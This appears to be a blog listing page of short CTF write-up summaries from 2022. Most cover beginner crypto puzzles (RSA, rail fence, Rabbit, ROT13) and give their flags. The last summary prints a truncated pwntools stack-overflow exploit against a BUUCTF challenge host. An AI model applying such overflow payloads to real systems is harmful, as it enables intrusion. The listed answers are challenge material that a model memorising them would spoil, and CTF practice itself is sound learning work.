上一页 1 ··· 7 8 9 10 11 12 下一页
摘要: 基本rsa,什么都给了,直接写脚本 import gmpy2 p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633 阅读全文
posted @ 2022-03-12 11:50 REPWNER 阅读(1) 评论(0) 推荐(0)
摘要: 找在线网站照着干就好了 阅读全文
posted @ 2022-03-12 01:59 REPWNER 阅读(2) 评论(0) 推荐(0)
摘要: 直接运行就行,但是是python2版本不对 要加utf-8 阅读全文
posted @ 2022-03-12 01:45 REPWNER 阅读(3) 评论(0) 推荐(0)
摘要: 这个栅栏密码曾经听过 其实原理就是把规定好得字数凑成一组,然后进行计算。 felhaagv{ewtehtehfilnakgw} 这个字长是两个,因为要凑flag flag{wethinkwehavetheflag} 阅读全文
posted @ 2022-03-12 01:26 REPWNER 阅读(13) 评论(0) 推荐(0)
摘要: 这题是rabbit解密 在线就可以 但是记录一个点,这种密码得特点好像是开头有U2Fsd 阅读全文
posted @ 2022-03-12 01:15 REPWNER 阅读(2) 评论(0) 推荐(0)
摘要: 写这个题,我一开始没去看题目名字 然后得到这个玩意 =E9=82=A3=E4=BD=A0=E4=B9=9F=E5=BE=88=E6=A3=92=E5=93=A6 我得思路就是这个一看就是16进制,然后一个个去解成10进制,然后我发现我数学天赋不够。 然后我就去查了一下这个加密方式。然后就出来了,意外 阅读全文
posted @ 2022-03-12 01:07 REPWNER 阅读(4) 评论(0) 推荐(0)
摘要: 这题是ascii码表 因为有下划线所以这么想 afZ_r9VYfScOeO_UL^RWUc 然后对表发现是从五开始依次加一 欧克 阅读全文
posted @ 2022-03-11 21:13 REPWNER 阅读(2) 评论(0) 推荐(0)
摘要: 这个就是对表 flag{ILOVEYOU} 但是空格问题我还是没有懂可能是表没对好吧 阅读全文
posted @ 2022-03-11 21:03 REPWNER 阅读(4) 评论(0) 推荐(0)
摘要: 很少写密码题。 打开来是synt{5pq1004q-86n5-46q8-o720-oro5on0417r1} 首先这个东西就很像flag了,一般这种就是移位。 想一想发现凯撒密码就是移位,掰手指算算synt和flag都是差13个位置。 那答案就出来了 阅读全文
posted @ 2022-03-11 20:50 REPWNER 阅读(2) 评论(0) 推荐(0)
摘要: 基础的pwn题 看到那个return的函数 记录点就是这是64位的,寄存器也是8个字节,所以辣鸡数据应该是136个字节 from pwn import * p = remote('node4.buuoj.cn',29514) payload = 'a'*136 + p64(0x400596) p.s 阅读全文
posted @ 2022-03-06 12:26 REPWNER 阅读(4) 评论(0) 推荐(0)
上一页 1 ··· 7 8 9 10 11 12 下一页